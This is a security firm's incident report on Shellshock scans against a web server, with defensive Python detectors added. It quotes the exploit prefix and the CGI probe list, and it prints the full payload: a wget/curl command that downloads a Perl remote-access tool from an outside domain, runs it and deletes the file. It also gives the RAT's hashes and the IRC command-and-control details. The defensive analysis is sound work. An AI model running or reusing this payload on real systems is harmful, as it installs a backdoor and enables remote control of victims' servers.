Analecta Cyber Company Blog: Shellshock Attempts in the Wild

2015-03-16

Shellshock Attempts in the Wild

Synopsis

From 2015-03-09T20:29:29 until 2015-03-09T20:29:51, automated scans originated from IP address 128.199.200.157. The scans attempted to exploit the 2014 Shellshock vulnerability (CVE-2014-6271). Had they succeeded, the attacker's commands would have downloaded a malicious Remote Administration Tool (RAT) and provided remote access to the system via an Internet Relay Chat (IRC) server hosted at IP address 216.70.100.172 (default IRC port, 6667). This report covers the exploit scan, the payload, the RAT's hash values, the source and command-and-control addresses, and the damage assessment.



Exploit

The remote attacker attempted to access 28 popular Common Gateway Interface (CGI) script paths in an automated manner. The first request made by the attacker's script was "GET HTTP/1.1 HTTP/1.1", an invalid Hypertext Transfer Protocol (HTTP) request line with no request target. The next 27 requests were as follows:

/cgi-bin/bash
/cgi-bin/contact.cgi
/cgi-bin/defaultwebpage.cgi
/cgi-bin/env.cgi
/cgi-bin/fire.cgi
/cgi-bin/forum.cgi
/cgi-bin/hello.cgi
/cgi-bin/index.cgi
/cgi-bin/main.cgi
/cgi-bin/meme.cgi
/cgi-bin/php
/cgi-bin/php4
/cgi-bin/php5
/cgi-bin/recent.cgi
/cgi-bin/sat-ir-web.pl
/cgi-bin-sdb/printenv
/cgi-bin/test-cgi
/cgi-bin/test.cgi
/cgi-bin/test-cgi.pl
/cgi-bin/test.sh
/cgi-bin/tools/tools.pl
/cgi-mod/index.cgi
/cgi-sys/defaultwebpage.cgi
/cgi-sys/entropysearch.cgi
/cgi-sys/php5
/phppath/cgi_wrapper
/phppath/php

The referrer (HTTP Referer header) of these requests starts with the standard Shellshock exploit string, the Bash function-definition prefix that a vulnerable Bash would parse out of an environment variable:

() { :;};
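As an added example (not part of the original report), the following Python detects this scan pattern in web server access logs: it flags the "() {" prefix in the request line, Referer or User-Agent, the malformed request line with no target, and requests for the CGI paths listed above. The log lines are constructed for the example in Apache "combined" format; the probe string is the report's prefix followed by a harmless echo placeholder rather than the real payload.

```python
import re
from typing import Dict, List, Optional

# CGI script paths requested by the scanner, as listed in the report.
PROBED_CGI_PATHS = {
    "/cgi-bin/bash", "/cgi-bin/contact.cgi", "/cgi-bin/defaultwebpage.cgi",
    "/cgi-bin/env.cgi", "/cgi-bin/fire.cgi", "/cgi-bin/forum.cgi",
    "/cgi-bin/hello.cgi", "/cgi-bin/index.cgi", "/cgi-bin/main.cgi",
    "/cgi-bin/meme.cgi", "/cgi-bin/php", "/cgi-bin/php4", "/cgi-bin/php5",
    "/cgi-bin/recent.cgi", "/cgi-bin/sat-ir-web.pl", "/cgi-bin-sdb/printenv",
    "/cgi-bin/test-cgi", "/cgi-bin/test.cgi", "/cgi-bin/test-cgi.pl",
    "/cgi-bin/test.sh", "/cgi-bin/tools/tools.pl", "/cgi-mod/index.cgi",
    "/cgi-sys/defaultwebpage.cgi", "/cgi-sys/entropysearch.cgi",
    "/cgi-sys/php5", "/phppath/cgi_wrapper", "/phppath/php",
}

# The Shellshock trigger is a Bash function definition "() {" at the start of a
# header value; whitespace between "()" and "{" is tolerated so trivial
# variations are still caught.
SHELLSHOCK_RE = re.compile(r"\(\)\s*\{")

# Apache/nginx "combined" log format.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<request>[^"]*)" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<referer>[^"]*)" "(?P<agent>[^"]*)"$'
)

# Constructed sample log lines (not taken from the report's logs).
SAMPLE_LOG = """\
128.199.200.157 - - [09/Mar/2015:20:29:29 +0000] "GET HTTP/1.1 HTTP/1.1" 400 226 "-" "-"
128.199.200.157 - - [09/Mar/2015:20:29:30 +0000] "GET /cgi-bin/bash HTTP/1.1" 404 209 "() { :;}; echo probe" "() { :;}; echo probe"
128.199.200.157 - - [09/Mar/2015:20:29:31 +0000] "GET /cgi-bin/test.cgi HTTP/1.1" 404 209 "() { :;}; echo probe" "Mozilla/5.0"
10.0.0.5 - - [09/Mar/2015:20:31:02 +0000] "GET /index.html HTTP/1.1" 200 5120 "http://intranet.example/" "Mozilla/5.0"
"""


def parse_line(line: str) -> Optional[Dict[str, str]]:
    """Split one combined-format log line into its fields, or None if it does not parse."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None


def analyse(line: str) -> Optional[Dict[str, object]]:
    """Return a finding for a suspicious line, or None for an unremarkable one."""
    rec = parse_line(line)
    if rec is None:
        return None
    parts = rec["request"].split(" ")
    # A well-formed request line is "<method> <target> <version>"; the scanner's
    # first request, "GET HTTP/1.1 HTTP/1.1", carries a version where the target belongs.
    target = parts[1] if len(parts) == 3 else ""
    malformed = len(parts) != 3 or not target.startswith("/")
    hit_fields = [f for f in ("request", "referer", "agent") if SHELLSHOCK_RE.search(rec[f])]
    known_probe = target in PROBED_CGI_PATHS
    if not hit_fields and not malformed and not known_probe:
        return None
    return {
        "ip": rec["ip"],
        "time": rec["ts"],
        "target": target,
        "shellshock_fields": hit_fields,   # which header fields carried "() {"
        "malformed_request": malformed,
        "known_probe_path": known_probe,   # path is on the scanner's list
    }


def scan(log_text: str) -> List[Dict[str, object]]:
    """Run analyse() over every line of a log and keep only the findings."""
    return [f for f in (analyse(l) for l in log_text.strip().splitlines()) if f]


if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG):
        print(finding)
```

A request for a listed CGI path without the exploit string is still reported (as reconnaissance), so on a busy server the known_probe_path flag alone should be treated as lower confidence than a "() {" hit.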

Exploit Payload

The payload, when executed, downloads a malicious RAT to the file path /tmp/b.pl using the wget or curl utility, executes the script with the local perl interpreter, then deletes the script file from disk. The RAT keeps running in memory after the file is removed, so the file no longer exists within the filesystem while the process does. This can make identification of the running script difficult.


system(\"
wget http://margaretguttshall.org/cata.txt -O /tmp/b.pl;
curl -O /tmp/b.pl http://margaretguttshall.org/cata.txt;
perl /tmp/b.pl;
rm -rf /tmp/b.pl*
\");
Formatted for readability
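Because the payload removes /tmp/b.pl while the interpreter keeps running, a useful host check is to list interpreter processes whose script argument no longer exists on disk. The following Python is an added example (not part of the report or the RAT) that does this: it parses a process's argument vector, skips interpreter options and inline -e/-c code, and compares absolute script paths against the filesystem. The process table and fake filesystem are constructed so the demo runs offline; the live_processes() helper reads /proc and is assumed to be run on Linux.

```python
import os
from typing import Callable, Dict, Iterable, List, Optional, Tuple

# Script interpreters worth inspecting; the report's RAT was run with perl.
INTERPRETERS = {"perl", "python", "python2", "python3", "sh", "bash", "ruby"}


def script_argument(argv: List[str]) -> Optional[str]:
    """Return the script file an interpreter process was started with, or None.

    Leading interpreter options (perl -w, -I/path, ...) are skipped; inline code
    given with -e/-E/-c has no script file, so those commands return None.
    """
    if not argv or os.path.basename(argv[0]) not in INTERPRETERS:
        return None
    for arg in argv[1:]:
        if arg in ("-e", "-E", "-c"):
            return None
        if arg.startswith("-"):
            continue
        return arg
    return None


def find_deleted_scripts(
    processes: Iterable[Tuple[int, List[str]]],
    path_exists: Callable[[str], bool] = os.path.exists,
) -> List[Dict[str, object]]:
    """Flag interpreter processes whose script path no longer exists on disk.

    Only absolute script paths are judged; a relative path would need the
    process's working directory to resolve, so it is skipped rather than guessed.
    """
    findings: List[Dict[str, object]] = []
    for pid, argv in processes:
        script = script_argument(argv)
        if script and os.path.isabs(script) and not path_exists(script):
            findings.append({"pid": pid, "interpreter": argv[0], "script": script})
    return findings


def live_processes() -> Iterable[Tuple[int, List[str]]]:
    """Yield (pid, argv) for every process visible under /proc (Linux only)."""
    for entry in os.listdir("/proc"):
        if not entry.isdigit():
            continue
        try:
            with open(f"/proc/{entry}/cmdline", "rb") as fh:
                raw = fh.read()
        except OSError:  # process exited or permission denied
            continue
        argv = [a.decode("utf-8", "replace") for a in raw.split(b"\0") if a]
        if argv:
            yield int(entry), argv


# Constructed process table (hypothetical PIDs, not from the report) and a fake
# filesystem for an offline run.  PID 1234 mirrors the report's case: perl was
# started on /tmp/b.pl, which the payload then deleted.
SAMPLE_PROCESSES = [
    (1234, ["perl", "/tmp/b.pl"]),
    (1300, ["perl", "-w", "/usr/local/bin/report.pl"]),   # script still present
    (1400, ["perl", "-e", "print 1"]),                     # inline code, no file
    (1500, ["/usr/sbin/httpd", "-DFOREGROUND"]),           # not an interpreter
    (1600, ["perl", "b.pl"]),                              # relative path, skipped
]
FAKE_FS = {"/usr/local/bin/report.pl"}


def demo() -> List[Dict[str, object]]:
    """Run the check against the constructed table using the fake filesystem."""
    return find_deleted_scripts(SAMPLE_PROCESSES, path_exists=lambda p: p in FAKE_FS)


if __name__ == "__main__":
    print("sample table:", demo())
    if os.path.isdir("/proc"):
        print("this host:", find_deleted_scripts(live_processes()))
```

On a live Linux host, /proc/PID/cwd and the links under /proc/PID/fd also show a "(deleted)" suffix when they point at removed files, which complements this argument-based check for interpreters that keep the script handle open.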

Remote Administration Tool (RAT)

The Perl-based remote administration tool was retrieved from the following URL (http has been replaced by hxxp):
hxxp://margaretguttshall.org/cata.txt

This file is 32,448 bytes in length.
MD5: 781b647de09953f1b20082840580dd59
SHA1: da9e2d09888a00fb2f6c50eeff45201fbd1efbfb
SHA256: b268b13f7d6405688d9285c0b14d1b59f9dcf90d8b1f2105c177650f61493345

Origin IP Address

128.199.200.157 resolves to h.pekanbaru.co


Command and Control IP Address

216.70.100.172 resolves to 5RHYTHMS.COM

When the RAT connects to the command and control IRC server, it joins the #blackcat channel and randomly creates a nickname of "x-" followed by a number between 1 and 1000. No interactions with compromised systems were identified during our analysis.


Indicators of Compromise and Remediation


  • Connections to or from IP addresses 128.199.200.157 or 216.70.100.172.
  • Connections over TCP port 6667, which may indicate a connection to an IRC server; IRC is common for some classes of remote command and control.
  • A running perl process that is not typical for the system.
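The network indicators above, together with the nickname and channel behaviour described in the command and control section, can be matched mechanically. The Python below is an added example (not from the report) that checks constructed connection records for the two IP addresses and the IRC port, and checks client-to-server IRC commands for the "x-<number>" nickname pattern and the #blackcat channel. The record format (timestamp, source, source port, destination, destination port, protocol) and all sample values other than the report's IOCs are assumptions made for the example.

```python
import re
from typing import Dict, List

# Indicators from the report.
IOC_IPS = {"128.199.200.157", "216.70.100.172"}   # scanner origin, IRC C2
IRC_PORT = 6667                                     # default IRC port used by the C2
IOC_CHANNEL = "#blackcat"

# The RAT's nickname: "x-" followed by a number, reported as 1-1000.  Any number
# is matched so a variant outside that range is still surfaced.
NICK_RE = re.compile(r"^NICK\s+(x-(\d+))\s*$", re.IGNORECASE)
JOIN_RE = re.compile(r"^JOIN\s+(\S+)", re.IGNORECASE)

# Constructed connection records: ts src sport dst dport proto (not real traffic).
SAMPLE_FLOWS = """\
2015-03-09T20:29:29Z 128.199.200.157 51234 10.0.0.12 80 tcp
2015-03-09T20:29:55Z 10.0.0.12 40001 216.70.100.172 6667 tcp
2015-03-09T20:30:10Z 10.0.0.12 40002 203.0.113.8 443 tcp
2015-03-09T20:31:00Z 10.0.0.12 40003 198.51.100.7 6667 tcp
"""

# Constructed client-to-server IRC commands as a sensor might reassemble them.
SAMPLE_IRC = [
    "NICK x-417",
    "USER a b c :d",
    "JOIN #blackcat",
    "PRIVMSG #blackcat :hi",
    "NICK alice",
    "JOIN #linux,#perl",
]


def check_flows(text: str) -> List[Dict[str, object]]:
    """Return the records that touch an IOC address or the IRC port, with reasons."""
    findings: List[Dict[str, object]] = []
    for line in text.strip().splitlines():
        ts, src, _sport, dst, dport, proto = line.split()
        reasons = []
        if src in IOC_IPS or dst in IOC_IPS:
            reasons.append("ioc-ip")
        if proto == "tcp" and int(dport) == IRC_PORT:
            reasons.append("irc-port")   # lower confidence on its own: any IRC use
        if reasons:
            findings.append({"ts": ts, "src": src, "dst": dst,
                             "dport": int(dport), "reasons": reasons})
    return findings


def check_irc(lines: List[str]) -> List[Dict[str, object]]:
    """Flag NICK commands matching the RAT pattern and JOINs to the IOC channel."""
    findings: List[Dict[str, object]] = []
    for line in lines:
        m = NICK_RE.match(line)
        if m:
            n = int(m.group(2))
            findings.append({"line": line, "reason": "rat-nick-pattern",
                             "in_report_range": 1 <= n <= 1000})
            continue
        m = JOIN_RE.match(line)
        # JOIN may carry a comma-separated list of channels.
        if m and IOC_CHANNEL in m.group(1).lower().split(","):
            findings.append({"line": line, "reason": "ioc-channel"})
    return findings


if __name__ == "__main__":
    for f in check_flows(SAMPLE_FLOWS) + check_irc(SAMPLE_IRC):
        print(f)
```

A hit on port 6667 alone only says that IRC was used; a hit on one of the two addresses, or on the nickname pattern together with the channel, is the stronger indicator.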


Damage Assessment

No damage was sustained by the server from these requests. If the attack had been successful the intruder would have the privileges of the running web server user. It's likely the attacker would create a secondary method of access and/or attempt to escalate to a more privileged user account.

Reference:

It is important to note that the registered owners of the IP addresses involved in this attack may themselves be victims of a network incident. In many cases the IP addresses identified in an incident are owned by one person or organization but are under the control of an unauthorized user.


For assistance with log analysis or event mitigation, contact us: info@analecta-llc.com
